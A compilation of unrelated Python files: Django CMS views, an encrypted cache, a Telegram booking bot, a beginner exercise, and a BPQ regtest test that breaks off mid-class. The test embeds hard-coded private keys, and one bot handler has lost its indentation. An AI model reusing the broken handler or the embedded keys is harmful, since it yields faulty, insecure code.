                fmt=log_format,
            )
    def get_logger(self):
        """Return the configured logging.Logger instance."""
        return self.logger
def parse(level):
    """Normalise a level name and resolve it to a logging module constant.

    Returns (LEVEL_NAME, logging_level); prints an error and exits the
    process on unknown names.
    """
    level = level.upper()
    levels = {
        "DEBUG": logging.DEBUG,
        "INFO": logging.INFO,
        "WARNING": logging.WARNING,
        "ERROR": logging.ERROR,
        "CRITICAL": logging.CRITICAL,
    }
    if level not in levels:
        # The original message forgot to list DEBUG among supported levels.
        print("Error: unknown log level,supported: {'DEBUG','INFO','WARNING','ERROR','CRITICAL'}")
        sys.exit(1)
    return level, levels[level]
|
""" View handler definitions for Nine CMS """
__author__ = 'George Karakostas'
__copyright__ = 'Copyright 2015, George Karakostas'
__licence__ = 'BSD-3'
__email__ = 'gkarak@9-dev.com'
from django.shortcuts import render, redirect, get_object_or_404
from django.views.generic import View
from django.template import loader
from django.http import Http404
from django.core.mail import mail_managers, BadHeaderError
from django.core.exceptions import PermissionDenied
from django.contrib import messages
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.models import Group
from django.utils.translation import ugettext as _
from ninecms.utils.render import NodeView
from ninecms.utils.perms import get_perms, set_perms
from ninecms.utils import status
from ninecms.models import Node, PageType, MenuItem
from ninecms.forms import ContactForm, LoginForm, RedirectForm, ContentTypePermissionsForm
class ContentNodeView(NodeView):
    """ Display a node as invoked by its node id from /cms/content/<node_id>
    If an alias exists then issue redirect to allow a single content page per URL
    """
    def get(self, request, **kwargs):
        """ HTML get for /cms/content/<node_id>
        :param request: the request object
        :param kwargs: contains node_id
        :return: response object
        """
        node = get_object_or_404(Node, id=kwargs['node_id'])
        if node.alias:
            # Canonicalise: an aliased node is served only at its alias URL.
            return redirect('ninecms:alias', url_alias=(node.alias + '/'), permanent=True)
        if not node.status and not request.user.has_perm('ninecms.view_unpublished'):
            # Unpublished nodes require the dedicated view permission.
            raise PermissionDenied
        return self.render(node, request)
class AliasView(NodeView):
    """ Render content based on Url Alias """
    def get(self, request, **kwargs):
        """ HTML get for /<url_alias>
        :param request: the request object
        :param kwargs: contains url_alias
        :return: response object
        """
        # Only serve trailing-slash URLs; otherwise redirect to the
        # slash-terminated variant so each page has one canonical URL.
        if kwargs['url_alias'][-1] == '/':
            alias = kwargs['url_alias'][:-1]
            # NOTE(review): alias == '/' only happens for a '//' URL; the
            # front page itself is handled by IndexView — confirm intent.
            if alias == '/':
                return redirect('ninecms:index', permanent=True)  # pragma: no cover
            try:
                node = self.get_node_by_alias(alias, request)
            except IndexError:
                raise Http404
            if not node.status and not request.user.has_perm('ninecms.view_unpublished'):
                raise PermissionDenied
            if node.redirect:
                return redirect(node.get_redirect_path(), permanent=True)
            return self.render(node, request)
        else:
            return redirect('ninecms:alias', url_alias=(kwargs['url_alias'] + '/'), permanent=True)
class IndexView(NodeView):
    """ Render index at root / """
    def get(self, request):
        """ HTML get for /
        :param request: the request object
        :return: response object
        """
        try:
            node = self.get_node_by_alias('/', request)
        except IndexError:
            # No node has the '/' alias yet: point the admin at the backend.
            messages.warning(request, "No front page has been created yet.")
            return redirect('admin:index')
        return self.render(node, request)
class ContactView(View):
    """ Handle contact post request """
    form_class = ContactForm
    def post(self, request):
        """ Handle contact form send
        :param request: the request object
        :return: response object
        """
        form = self.form_class(request.POST)
        if form.is_valid():
            t = loader.get_template('ninecms/mail_contact.txt')
            c = {
                'sender_name': form.cleaned_data['sender_name'],
                'sender_email': form.cleaned_data['sender_email'],
                'message': form.cleaned_data['message'],
            }
            try:
                mail_managers(form.cleaned_data['subject'], t.render(c))
            except BadHeaderError:  # pragma: no cover
                messages.error(request, _("Contact form message has NOT been sent. Invalid header found."))
            else:
                messages.success(request, _("A message has been sent to the site using the contact form."))
            return redirect(form.cleaned_data['redirect'])
        messages.warning(request, _("Contact form message has NOT been sent. Please fill in all contact form fields."))
        # Preserve the submitted values in the session so the form can be re-filled.
        request.session['contact_form_post'] = request.POST
        return redirect(form.cleaned_data['redirect'])
class LoginView(View):
    """ Handle login post request """
    form_class = LoginForm
    def post(self, request):
        """ Handle login form send
        :param request: the request object
        :return: response object
        """
        form = self.form_class(request.POST)
        if form.is_valid():
            user = authenticate(username=form.cleaned_data['username'], password=form.cleaned_data['password'])
            if user is not None:
                if user.is_active:
                    login(request, user)
                    messages.success(request, _("Login successful for %s.") % user.username)
                else:
                    msg = _("The account is disabled. Please use the contact form for more information.")
                    messages.warning(request, msg)
            else:
                msg = _("Unfortunately the username or password are not correct. "
                        "If you have forgotten your password use the link below the form to recover it.")
                messages.warning(request, msg)
        else:
            messages.warning(request, _("Please fill in all login form fields."))
            request.session['login_form_post'] = request.POST
        # NOTE(review): on an invalid form, cleaned_data may not contain
        # 'redirect' — confirm the form guarantees it before this lookup.
        return redirect(form.cleaned_data['redirect'])
class LogoutView(View):
    """ Handle logout post request """
    form_class = RedirectForm
    def post(self, request):
        """ Handle logout form send
        :param request: the request object
        :return: response object
        """
        form = self.form_class(request.POST)
        if form.is_valid():
            logout(request)
            messages.success(request, _("Logout successful."))
        # NOTE(review): on an invalid form, cleaned_data may lack 'redirect'
        # — confirm RedirectForm guarantees the key before this lookup.
        return redirect(form.cleaned_data['redirect'])
class ContentTypePermsView(View):
    """ Content edit form at /cms/types/<id>/edit """
    permissions_form_class = ContentTypePermissionsForm
    def get(self, request, **kwargs):
        """ HTML get for /cms/types/<node_id>/edit
        :param request: the request object
        :param kwargs: contains node_id
        :return: response object
        """
        page_type = get_object_or_404(PageType, id=kwargs['type_id'])
        perms = get_perms(page_type, list(self.permissions_form_class().fields.keys()), '_pagetype')
        permissions_form = self.permissions_form_class(initial=perms)
        groups = Group.objects.all().count()
        return render(request, 'admin/ninecms/pagetype/perms_form.html', {
            'permissions_form': permissions_form,
            'groups': groups,
            'page_type': page_type,
            'clone': kwargs.get('clone', False),
        })
    def post(self, request, **kwargs):
        """ HTML post for /cms/types/<id>/edit
        :param request: the request object
        :param kwargs: contains node_id
        :return: response object
        """
        page_type = get_object_or_404(PageType, id=kwargs['type_id'])
        permissions_form = self.permissions_form_class(request.POST)
        groups = Group.objects.all().count()
        if permissions_form.is_valid():
            # has_perms (plural) checks every permission in the sequence;
            # the original called has_perm() with a tuple, which standard
            # auth backends never match (they compare a single perm string),
            # so the permission check always failed silently.
            if request.user.has_perms(('guardian.add_groupobjectpermission',
                                       'guardian.change_groupobjectpermission',
                                       'guardian.delete_groupobjectpermission')):
                set_perms(page_type, list(permissions_form.fields.keys()), '_pagetype', permissions_form.cleaned_data)
            messages.success(request, _("Content type '%s' has been updated.") % page_type.name)
            return redirect('admin:ninecms_pagetype_changelist')
        else:  # pragma: nocover
            messages.warning(request, _("Content type has not been updated. Please check the form for errors."))
            return render(request, 'admin/ninecms/pagetype/perms_form.html', {
                'permissions_form': permissions_form,
                'groups': groups,
                'page_type': page_type,
            })
class StatusView(View):
    """ Status page at cms/status """
    # noinspection PyUnusedLocal
    def get(self, request):
        """ HTML get for status page
        :return: response object
        """
        # The status page has no GET UI of its own; send admins to the index.
        return redirect('admin:index', permanent=True)
    # noinspection PyMethodMayBeStatic
    def post(self, request):
        """ HTML post for status page
        If menu-rebuild has been posted, rebuild menu and redirect
        If clear-cache has been posted, clear cache and redirect
        :param request: the request object
        :return: response object (redirect to get)
        """
        if 'menu-rebuild' in request.POST:
            # noinspection PyUnresolvedReferences
            MenuItem.objects.rebuild()
            messages.success(request, _("Menu has been rebuilt."))
        if 'clear-cache' in request.POST:
            status.cache_clear()
            messages.success(request, _("Cache has been cleared."))
        return redirect('admin:index')
|
from src.block import DataBlock
class MessageModeA(object):
    """Decode one mode-A message from validated data blocks and format it
    as space-separated 5-character groups (header line + data lines)."""
    def __init__(self, metablock, valid_blocks, message_id):
        self.__metadata_block = metablock
        self.__valid_blocks = valid_blocks
        self.__header_len = 5
        self.__data_string = ""
        self.__output = ""
        self.__message_id = message_id
        self.__encode()
    def __encode(self):
        """Concatenate the decoded payload of every block of this message."""
        data_block = DataBlock()
        message_start = self.__metadata_block.message_start_blocks[self.__message_id]
        message_end = self.__metadata_block.message_start_blocks[self.__message_id + 1]
        if message_end == 0:
            # 0 marks "last message": it runs to the end of the blocks.
            message_end = len(self.__valid_blocks)
        for block_index in range(message_start, message_end):
            # Every 16th block is skipped (metadata, presumably — confirm).
            # The original used `is not 0`, an identity comparison on an int
            # (a SyntaxWarning since Python 3.8); `!= 0` is the correct test.
            if block_index in self.__valid_blocks and block_index % 16 != 0:
                self.__data_string += data_block.decode("".join([str(i) for i in self.__valid_blocks[block_index]]))
            elif block_index not in self.__valid_blocks:
                raise IndexError
        self.__encode_5er()
    def __encode_5er(self):
        """Render self.__data_string as 5-char groups: 5 header groups on
        the first line, then 10 groups per data line."""
        _5er = [self.__data_string[i:i + 5] for i in range(0, len(self.__data_string), 5)]
        header = _5er[0:5]
        data_5er = _5er[5:]
        for j in range(5):
            self.__output += header[j]
            if j == 4:
                self.__output += "\n"
            else:
                self.__output += " "
        # NOTE(review): range(1, len(data_5er)) emits data_5er[0..n-2] and
        # drops the final group — confirm whether that is intentional.
        for i in range(1, len(data_5er)):
            self.__output += data_5er[i - 1]
            if i % 10 == 0 and i != 0:
                self.__output += "\n"
            else:
                self.__output += " "
    @property
    def id(self):
        return self.__message_id
    @property
    def content(self):
        return self.__output
class MessageModeB(object):
    """Mode-B message wrapper: currently only stores its inputs."""
    def __init__(self, metablock, valid_blocks):
        self.__metablock = metablock
        self.__valid_blocks = valid_blocks
|
import os
import threading
from time import time
from filebytecontent import FileByteContent
from mixslice import MixSlice
LOCK = threading.Lock()
class CacheEntry:
    """Plaintext cache record for one file, with open/dirty bookkeeping."""
    def __init__(self, path, content, mtime=None):
        now = int(time())
        self.path = path
        self.content = content
        # Number of concurrent apps that currently have this file open.
        self.opens = 1
        # A freshly created file (no mtime given) starts out dirty.
        self.modified = not mtime
        self.atimes = now
        self.mtimes = mtime if mtime else now
class Cache:
    """In-memory store of decrypted file contents, keyed by path.

    Every public method takes the module-level LOCK; entries are reference
    counted via CacheEntry.opens and dropped on the last release().
    """
    def __init__(self):
        # path -> CacheEntry
        self.files = {}
    def __contains__(self, path):
        return path in self.files
    # ------------------------------------------------------ Helpers
    def _decrypt(self, path, key, iv):
        # Read and decrypt the on-disk file, returning plaintext bytes.
        return MixSlice.decrypt(path, key, iv)
    def _encrypt(self, path, key, iv):
        # Re-encrypt the cached plaintext back to disk.
        plaintext = self.files[path].content.read_all()
        MixSlice.encrypt(plaintext, path, key, iv)
    # ------------------------------------------------------ Methods
    def open(self, path, key, iv, mtime):
        """Decrypt *path* into the cache, or bump its open count if cached."""
        with LOCK:
            if path in self.files:
                self.files[path].opens += 1
                return
            plaintext = FileByteContent(self._decrypt(path, key, iv))
            self.files[path] = CacheEntry(path, plaintext, mtime)
    def create(self, path, key, iv):
        """Create an empty cached file and write it to disk immediately."""
        with LOCK:
            if path in self.files:
                self.files[path].opens += 1
                return
            plaintext = FileByteContent(b'')
            self.files[path] = CacheEntry(path, plaintext)
        self.flush(path, key, iv)
    def read_bytes(self, path, offset, length):
        """Read from the cached plaintext; None when the path is not cached."""
        with LOCK:
            if path not in self.files:
                return None
            content = self.files[path].content
            return content.read_bytes(offset, length)
    def write_bytes(self, path, buf, offset):
        """Write into the cached plaintext, marking the entry dirty."""
        with LOCK:
            if path not in self.files:
                return 0
            content = self.files[path].content
            bytes_written = content.write_bytes(buf, offset)
            self.files[path].modified = True
            self.files[path].mtimes = int(time())
            return bytes_written
    def truncate_bytes(self, path, length):
        """Truncate the cached plaintext, marking the entry dirty."""
        with LOCK:
            if path not in self.files:
                return
            content = self.files[path].content
            content.truncate(length)
            self.files[path].modified = True
            self.files[path].mtimes = int(time())
    def flush(self, path, key, iv):
        """Persist the entry: restore timestamps and re-encrypt if dirty.

        NOTE(review): LOCK is released between the two blocks below, so
        another thread could modify the entry in between — confirm this
        window is acceptable to callers.
        """
        with LOCK:
            if path not in self.files:
                return
            file_already_exists = os.path.exists(path)
            if file_already_exists:
                os.utime(path, (self.files[path].atimes, self.files[path].mtimes))
        with LOCK:
            if not self.files[path].modified:
                return
            self.files[path].modified = False
            self._encrypt(path, key, iv)
            if not file_already_exists:
                os.utime(path, (self.files[path].atimes, self.files[path].mtimes))
    def release(self, path):
        """Drop one reference; evict the entry when no one holds it open."""
        with LOCK:
            if path not in self.files:
                return
            self.files[path].opens -= 1
            if not self.files[path].opens:
                del self.files[path]
    def get_size(self, path):
        """Return the cached plaintext length, or 0 when not cached."""
        with LOCK:
            if path not in self.files:
                return 0
            return len(self.files[path].content)
    def rename(self, old, new):
        """Re-key a cached entry from *old* to *new* (no disk I/O here)."""
        with LOCK:
            if old not in self.files:
                return
            self.files[new] = self.files[old]
            del self.files[old]
|
#!/usr/bin/env pypy
from os import system as sh
# Per-case generator parameters, consumed pairwise: n and d are passed to
# ./gen.py for each test case (what `d` toggles is defined by gen.py — TODO confirm).
N = [4, 10, 13, 20, 48, 100, 199, 297, 356, 477, 500, 892, 998, 1397, 1452, 1823, 1897, 1943, 2000, 1998]
D = [1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1]
# NOTE: Python 2 syntax (print statement) — run with the pypy in the shebang.
for i, (n, d) in enumerate(zip(N, D), start=1):
    print "(info) Generating 'sequence%s.in'..." % i
    sh("./gen.py %s %s > sequence%s.in" % (n, d, i))
    print "(info) Generating 'sequence%s.ans'..." % i
    # Reference answers come from running the trusted solution ./std.
    sh("./std < sequence%s.in > sequence%s.ans" % (i, i))
|
import logging
from aiogram import types
from aiogram.dispatcher import FSMContext
from aiogram.dispatcher.filters import Command, Text
from aiogram.types import CallbackQuery, Message
from helpers.api import (create_register, ger_or_create_user, get_masters,
get_masters_dates, get_masters_hours,
get_masters_services, get_user)
from helpers.states import OrderTrim
from keyboards.inline.callback_datas import (date_callback, hour_callback,
master_callback, service_callback)
from keyboards.inline.choice_buttons import (get_dates_keyboard,
get_hours_keyboard,
get_masters_keyboard,
get_services_keyboard)
from keyboards.reply_keyboard.choice_buttons import get_share_phone_keyboard
from loader import bot, dp
@dp.message_handler(content_types=['contact'])
async def contact(message: Message, state: FSMContext):
    """Receive the user's shared phone contact, look up or create the user,
    then start the booking flow by asking to pick a master.
    """
    if message.contact is None:
        await message.answer("Что-то пошло не так. Давай попробуем еще раз")
        return
    await message.answer(
        'Благодуха, номер получен. Сейчас найдем тебя или создадим новый профиль',
        reply_markup=types.ReplyKeyboardRemove(),
    )
    user = await ger_or_create_user(message.contact, message.chat)
    if user:
        await message.answer(text=f"Привет, {user['first_name']}")
        await state.update_data(user_id=user['id'])
        masters = await get_masters()
        keyboard = get_masters_keyboard(masters)
        await message.answer(text="К кому пойдешь?", reply_markup=keyboard)
        await OrderTrim.waiting_for_master.set()
@dp.message_handler(Command("trim"), state='*')
async def order_trim(message: Message, state: FSMContext):
"""
Инициализация записи и выбор мастера
"""
chat_id = getattr(message.chat, 'id')
username = getattr(message.chat, 'username')
user = await get_user(chat_id)
try:
await message.answer(text=f"Привет, {user['first_name']}")
await state.update_data(user_id=user['id'])
masters = await get_masters()
keyboard = get_masters_keyboard(masters)
await message.answer(text="К кому пойдешь?", reply_markup=keyboard)
await OrderTrim.waiting_for_master.set()
except KeyError:
keyboard = get_share_phone_keyboard()
await message.answer(
text=f"Привет, {username}. Похоже, мы впервые тут общаемся. Подскажи свой номер телефона",
reply_markup=keyboard,
)
@dp.callback_query_handler(master_callback.filter(), state=OrderTrim.waiting_for_master)
async def order_date(call: CallbackQuery, callback_data: dict, state: FSMContext):
    """Store the chosen master and ask the user to pick a date."""
    await call.message.edit_reply_markup(reply_markup=None)
    master_id = callback_data.get('id')
    master_name = callback_data.get('name')
    await call.message.answer(f'{master_name} - отличный выбор.')
    await state.update_data(master_id=master_id)
    await state.update_data(master_name=master_name)
    logging.info(f"{callback_data}")
    master_dates = await get_masters_dates(master_id)
    keyboard = get_dates_keyboard(master_dates)
    await call.message.answer(text="На какую дату записать?", reply_markup=keyboard)
    await OrderTrim.waiting_for_date.set()
@dp.callback_query_handler(date_callback.filter(), state=OrderTrim.waiting_for_date)
async def order_time(call: CallbackQuery, callback_data: dict, state: FSMContext):
    """Store the chosen date and ask the user to pick a time slot."""
    await call.message.edit_reply_markup(reply_markup=None)
    entry_date = callback_data.get('entry_date')
    date_str = callback_data.get('date_str')
    order = await state.get_data()
    master_id = order['master_id']
    await call.message.answer(f'{date_str}. Запомнил.')
    logging.info(f"{callback_data}")
    master_hours = await get_masters_hours(master_id, entry_date)
    keyboard = get_hours_keyboard(master_hours)
    await call.message.answer(text="Во сколько ждать тебя?", reply_markup=keyboard)
    await OrderTrim.waiting_for_time.set()
@dp.callback_query_handler(hour_callback.filter(), state=OrderTrim.waiting_for_time)
async def order_service(call: CallbackQuery, callback_data: dict, state: FSMContext):
    """Store the chosen time slot and ask which service is wanted.

    NOTE(review): the handler below reuses the name `order_service`; the
    decorators register both, but the later definition shadows this one at
    module level — consider renaming one of them.
    """
    await call.message.edit_reply_markup(reply_markup=None)
    entry_hour = callback_data.get('entry_hour')
    working_hour_id = callback_data.get('id')
    await state.update_data(working_hour_id=working_hour_id)
    order = await state.get_data()
    master_id = order['master_id']
    await call.message.answer(f'{entry_hour}. Выбор сделан.')
    logging.info(f"{callback_data}")
    master_services = await get_masters_services(master_id)
    keyboard = get_services_keyboard(master_services)
    await call.message.answer(text="Что тебе нужно сделать?", reply_markup=keyboard)
    await OrderTrim.waiting_for_service.set()
@dp.callback_query_handler(service_callback.filter(), state=OrderTrim.waiting_for_service)
async def order_service(call: CallbackQuery, callback_data: dict, state: FSMContext):
    """Create the booking from the accumulated state and confirm to the user."""
    await call.message.edit_reply_markup(reply_markup=None)
    price_id = callback_data.get('id')
    order = await state.get_data()
    working_hour_id = order['working_hour_id']
    user_id = order['user_id']
    await call.message.answer('Принято. Сейчас запишем...')
    logging.info(f"{callback_data}")
    check_order = await create_register(user_id, working_hour_id, price_id)
    try:
        if check_order['state'] == 'new_register':
            await call.message.answer('Готово.')
    except KeyError:
        # API returned no 'state' key: registration failed.
        await call.message.answer(
            'Возникла засада с записью. Попробуй чуть позже. Либо позвони Романычу, он все сделает.'
        )
|
"""
Play RPS w/Bad Input
"""
p1 = None # can be invalid!
p2 = None # can be invalid!
"""
This is the same as the original RPS problem,
except that cannot expect the input to be valid.
While we *want* `r` or `p` or `s`, there is a possibility
that input can be anything like...
* `ROCK` (all caps)
* `R` (`r` but capitalized)
* `PAPrrRR` (incorrectly spelled, upper/lowercased)
Implement conditional statements that will sanitize the
user input or let user know that input is invalid.
"""
p1 = input('Choose r, p , or s, Player 1: ') # from user input
p2 = input('Choose r, p , or s, Player 2: ') # from user input
##### with data that must be corrected by user
p1 = 'R'
p2 = 'ROCK'
p1 = p1.lower()
p2 = p2.lower()
# BUG FIX: `p1 == 'r' or 'p' or 's'` is always truthy ('p' is a non-empty
# string), so invalid input was never detected. Test set membership instead.
if p1 in ('r', 'p', 's'):
    val1 = True
else:
    print("Player 1, please enter 'r', 'p', or 's' in the correct format.")
if p2 in ('r', 'p', 's'):
    val2 = True
else:
    print("Player 2, please enter 'r', 'p', or 's' in the correct format.")
#### with data that can be sanitized
p1 = 'R'
p2 = 'p'
p1 = p1.lower()
p2 = p2.lower()
if p1 == p2:
    # Same choice: draw.
    print(0)
else:
    # Outcome table: (p1, p2) -> number printed by the original elif chain.
    outcomes = {
        ('r', 's'): 1, ('r', 'p'): 2,
        ('p', 's'): 2, ('p', 'r'): 1,
        ('s', 'r'): 2, ('s', 'p'): 1,
    }
    result = outcomes.get((p1, p2))
    # Unknown pairs fall through silently, matching the original elif chain.
    if result is not None:
        print(result)
from google_auth import GoogleAuth

# Obtain an access token for the Google Fitness API using the service-account
# key file and print it to stdout.
KEY_PATH = "secrets.json"
SCOPES = ["https://www.googleapis.com/auth/fitness.activity.read"]

auth_client = GoogleAuth(KEY_PATH, SCOPES)
print(auth_client.get_token())
|
""" DocStrings and Default values of Named Tuples
Default Docs for Named Tuples
""" |
#!/usr/bin/env python3
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
from decimal import Decimal
# Number of pre-fork ("Bitcoin") blocks mined in regtest before the BPQ fork.
REGTEST_BIT_PREMINE = 2000
# Number of post-fork BPQ premine blocks.
REGTEST_BPQ_PREMINE = 100
# Public keys for the 2-of-3 multisig scripts that lock the premine outputs;
# one inner list per premine multisig address.
PREMINE_PUBKEYS = [
    [
        "100700000796a8f86cec8db8be05671641473f0464f0e142d177cfbbddf35464a14eefb4577310ac8bc2a4a3b2d01de0f57f4f4441e8d17c9081e9e6288dbd45942e8a231e",
        "10070000072f2908f2cd6a09103e2f905c6d71c258b575aeceef8a49774a265e7aa18992dcbed186011828972ec597149f3e9a5f0c7b179181d428045a257096a8a4e98280",
        "100700000760c88b3b0b67a4cb81084a64e1e13faf03ad167e8dc632445b4e47ef02a7cfd511f03f8869fe9b5dc43e2305071332b0cb9929563a7f9f3fea89cee93ce26a0c",
    ],
    [
        "100700000713bcd90cc2f8cf3ac9f4ab2e78c7e90129ec8d8f74968fc8ea9358e9e70a7e1049730ac52b1f7582513a7eeb09bc081a2b8bd596b2fc0f9f813f649a73bec5a5",
        "1007000007df63af45db773341e4316d8226bddc1d4a9bcae08bc287609ab7b0d6b4be687fd45ff1f03c3708a70379f14b39179ce513a1aa3dc40c2f32bfd572f543307ae3",
        "10070000078d4687e27cc2ab3347b1fcbb2b73860ea6e2a5e5cff8bf08f72302039f6ee2103aa754f83d2f854006e5d1c78e12f431ab1acf51138b7781b9501814643c09b3",
    ]
]
# Private keys matching PREMINE_PUBKEYS (same nesting), used to produce the
# partial signatures in spend_premine_test.
PREMINE_KEYS = [
    [
        "5UknnBacqeaFB1V5K51CvSz2x2TRA2C5g47GRJ4L7XyeZs613o14i8ijtoGbdrgPwpG8SdNz949gAX7u33bNGfSVpa68uj6XmsVsPMtFGafqhXSbmK1pHc5G8ACUVfmGCntSp1wHAtYu1ZvPnQtj7Jfe9Xci7EkMuFzH8DWMQTPBXoA1cBB5fLxY89jBqRztCzGi7BAY",
        "5UknnBacpmQf38DbrgmSN1oDj2Rre1KgYEQML2j6DMYyH4xq1vcv222eQjSkczaU1BezzLZNaB19NE9jUhnxTZ6G8bfYWQQr5aek2QsqNPD85rBKBXF2DdDwQcvCvwdP1rQU7ty3wGvMWSUrMK75s38iqATMmoabmo2ySHKS6467NhYycd1e82c771BQPQfc4Y6VpTMz",
        "5UknnBacqBwUFP9EKJZDBfmasU7Si2T9htowHSoLUBHpauZxoDpUGCYzFuXBSVp8cgE234WEwg61D1uiEZfGDGgstEpTCH4EL6iDTVX6giakFiVB5gVuY9Ea8vqaQgk9h9enVh7j8CfBZRZJwmgyRRL5jjebDNgnEbeWrUkgxuTF3JDjMXDKbH3Yk5kwgAwqfjd4tiSr",
    ],
    [
        "5UknnBacpXrPEFSnqn4TnpwvaPn1UFsLzABAyvLJoeehoE32SLteEJJFmnGzv9AvQDgLHZfUb1xoA7uSFHAXd2w446Z6N5f4nnaZiPt3wKnFKhArY3BYCi4MnjMRBDyAvsjahdmAWSTok6X82LEtVBRerCNnT7ocB5erSjSAGZHS56oSoFUE2NuLDeE5BKqm2WLXS5Sb",
        "5UknnBacrGXa8EBVjSaF5ni7QL2HhxtxoLCFngSzb9Djubmtrqy3JbucTL52AAn1gWbNNo5vX1JA7dnpExg2Nu3BBaN2h1Zuj3oxkTCVih4xjcUfFHTbnKMvEGwkmAKdz1BEackTKH5yMyCv5NgUNqgFcidYpGHsaMmGJ9KfhZPfbTWGcusGRixpvpfFqLCH1rxZCyoY",
        "5UknnBacqZwAhHe4WPCnQemh5GewFMUPxmrhiwC7jNUTtYTPcsFA1wjF96EiXLsWnELWAvafyVhnA9Y9YYZQUivftV2UYLFrJy1hkBcPh6UCL5j3VGwYgs9po2pHEi8qF1XELJRVpULijRipPUzKGGUmcezQsMpVJS8CdDxXkcSo1TSnqLo98JriSPDifqmmVC2kY51z",
    ]
]
class BpqTest(BitcoinTestFramework):
    """Regression test for the BPQ fork.

    Covers: mining the Bitcoin + BPQ premine, rejecting legacy ("Bitcoin")
    outputs after the fork, spending a premined multisig coinbase with two
    partial signatures, and an ordinary post-fork payment.
    """

    def set_test_params(self):
        # Four regtest nodes starting from an empty chain.
        self.num_nodes = 4
        self.setup_clean_chain = True

    def setup_network(self):
        # Fully mesh nodes 0-2 and hang node 3 off node 0.
        self.setup_nodes()
        connect_nodes_bi(self.nodes, 0, 1)
        connect_nodes_bi(self.nodes, 1, 2)
        connect_nodes_bi(self.nodes, 0, 2)
        connect_nodes_bi(self.nodes, 0, 3)

    def create_bitcoin_addr(self):
        """Create a legacy address ('L21') on node 2 and fund it from node 3."""
        result = self.nodes[3].getbalance()
        self.log.info("nodes[3] balance: %s", result)
        self.addr_L21 = self.nodes[2].getnewaddress("L21", "legacy")
        self.log.info("nodes[2] addr_L21: %s", self.addr_L21)
        # NOTE(review): trailing True presumably means subtract-fee-from-amount
        # as in the upstream sendtoaddress RPC — confirm against this fork.
        self.nodes[3].sendtoaddress(self.addr_L21, 200.0, "", "", True)
        pass

    def make_premine(self):
        """Mine the pre-fork ("Bitcoin") blocks, then the BPQ premine."""
        self.log.info("Bitcoin premine...")
        bitcoin_coinbase_addr = self.nodes[3].getnewaddress("", "legacy")
        bitcoin_blocks_count = REGTEST_BIT_PREMINE
        # First 200 blocks, generated 50 at a time, rotating across nodes.
        for i in range(200 // 50):
            peer = i % self.num_nodes
            self.nodes[peer].generatetoaddress(50, bitcoin_coinbase_addr)
            self.sync_all()
        bitcoin_blocks_count -= 200
        # Fund the legacy address while coinbases are still spendable pre-fork.
        self.create_bitcoin_addr()
        # Mine the remaining pre-fork blocks in batches of 50.
        for i in range(bitcoin_blocks_count // 50):
            peer = i % self.num_nodes
            self.nodes[peer].generatetoaddress(50, bitcoin_coinbase_addr)
            self.sync_all()
        self.log.info("BPQ premine...")
        for i in range(REGTEST_BPQ_PREMINE // 10):
            peer = i % self.num_nodes
            self.nodes[peer].generate(10)
            self.sync_all()

    def create_spend_tx(self, node, block_n, redeemScript, out_address):
        """Build a raw tx spending the coinbase of the first post-premine
        block to out_address for 90% of its value (the rest is the fee).

        Returns (rawTx hex, inputs list for signrawtransaction, amount sent).

        NOTE(review): block_n is never used — the height is hard-coded to
        REGTEST_BIT_PREMINE+1; confirm whether block_n should drive it.
        """
        blockId = self.nodes[0].getblockhash(REGTEST_BIT_PREMINE+1)
        block = self.nodes[0].getblock(blockId)
        txId = block['tx'][0]
        #self.log.info("spending tx: %s", txId)
        rawTx = node.gettransaction(txId)
        #self.log.info("rawTx: %s", rawTx)
        decTx = node.decoderawtransaction(rawTx['hex'])
        #self.log.info("decTx: %s", decTx)
        vout = decTx['vout'][0]
        #self.log.info("value: %s", vout['value'])
        from_address = node.validateaddress(vout['scriptPubKey']['addresses'][0])
        #self.log.info("from_address: %s", from_address)
        inputs = [{
            "txid" : txId,
            "vout" : vout['n'],
            "scriptPubKey" : vout['scriptPubKey']['hex'],
            "redeemScript" : redeemScript,
            "amount" : vout['value']
        }]
        amount = (vout['value'] * Decimal('0.9')).quantize(Decimal('0.00000001'))
        outputs = { out_address : amount }
        rawTx = node.createrawtransaction(inputs, outputs)
        return rawTx, inputs, amount

    def spend_premine_test(self):
        """Spend a premined coinbase locked by the 2-of-3 multisig using two
        partial signatures, then assert the funds arrive on node 0."""
        # premine_addr_0['address']
        # premine_addr_0['redeemScript']
        premine_addr_0 = self.nodes[3].createmultisig(2, PREMINE_PUBKEYS[0] )
        premine_addr_1 = self.nodes[3].createmultisig(2, PREMINE_PUBKEYS[1] )
        self.log.info("premine_addr_0: %s", premine_addr_0['address'])
        self.log.info("premine_addr_1: %s", premine_addr_1['address'])
        # Watch-only imports so node 0 can see the premine outputs.
        self.nodes[0].importaddress(premine_addr_0['address'], "premine0")
        self.nodes[0].importaddress(premine_addr_1['address'], "premine1")
        addr_0 = self.nodes[0].validateaddress(self.nodes[0].getnewaddress("addr_0"))
        addr_1 = self.nodes[1].validateaddress(self.nodes[1].getnewaddress("addr_1"))
        addr_2 = self.nodes[2].validateaddress(self.nodes[2].getnewaddress("addr_2"))
        # create transaction
        rawTx, inputs, amount_0 = self.create_spend_tx(self.nodes[0], REGTEST_BIT_PREMINE+1,
                                                       premine_addr_0['redeemScript'], addr_0['address'])
        #self.log.info("Tx inputs: %s", inputs)
        #self.log.info("decTx: %s", self.nodes[0].decoderawtransaction(rawTx))
        # sign 1 — first of the two required signatures; tx is still incomplete.
        rawTxPartialSigned = self.nodes[0].signrawtransaction(rawTx, inputs, [
            { "key" : PREMINE_KEYS[0][0], "index": 1 }])
        #self.log.info("rawTxPartialSigned: %s", rawTxPartialSigned)
        assert_equal(rawTxPartialSigned['complete'], False)
        rawTx = rawTxPartialSigned['hex']
        #self.log.info("decTxPartialSigned: %s", self.nodes[0].decoderawtransaction(rawTxPartialSigned['hex']))
        assert_equal(rawTxPartialSigned['complete'], False)
        # sign 2 — second signature completes the 2-of-3 multisig.
        rawTxPartialSigned = self.nodes[1].signrawtransaction(rawTx, inputs, [
            { "key" : PREMINE_KEYS[0][1], "index": 1 }])
        #self.log.info("rawTxPartialSigned: %s", rawTxPartialSigned)
        assert_equal(rawTxPartialSigned['complete'], True)
        rawTx = rawTxPartialSigned['hex']
        # send transaction and confirm it with 6 blocks
        spendTx0 = self.nodes[3].sendrawtransaction(rawTx)
        self.nodes[3].generate(6)
        self.sync_all()
        result = self.nodes[0].getbalance()
        #self.log.info("node0 balance: %s", result)
        assert_equal(result, amount_0)
        pass

    def first_transaction_test(self):
